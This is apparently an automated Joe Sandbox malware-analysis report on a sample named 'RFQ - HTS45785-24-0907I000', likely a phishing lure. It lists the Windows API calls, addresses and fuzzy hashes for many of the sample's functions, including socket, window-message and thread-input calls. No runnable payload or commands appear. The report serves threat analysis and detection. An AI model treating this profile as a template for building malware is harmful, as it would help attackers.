                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                        APIs
                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                        Strings
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                        • String ID: cdecl
                                                        • API String ID: 3850814276-3896280584
                                                        • Opcode ID: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                        • Opcode Fuzzy Hash: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                        APIs
                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                        • _memmove.LIBCMT ref: 0046D475
                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 2502553879-0
                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                        APIs
                                                        • SendMessageW.USER32 ref: 00448C69
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                        APIs
                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                        • String ID:
                                                        • API String ID: 1358664141-0
                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                        • String ID:
                                                        • API String ID: 1187119602-0
                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1597257046-0
                                                        • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                        • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                        • String ID:
                                                        • API String ID: 237123855-0
                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconWindow
                                                        • String ID:
                                                        • API String ID: 3349847261-0
                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                        • String ID:
                                                        • API String ID: 2223660684-0
                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                        • EndPath.GDI32(?), ref: 00447336
                                                        • StrokePath.GDI32(?), ref: 00447344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 2783949968-0
                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
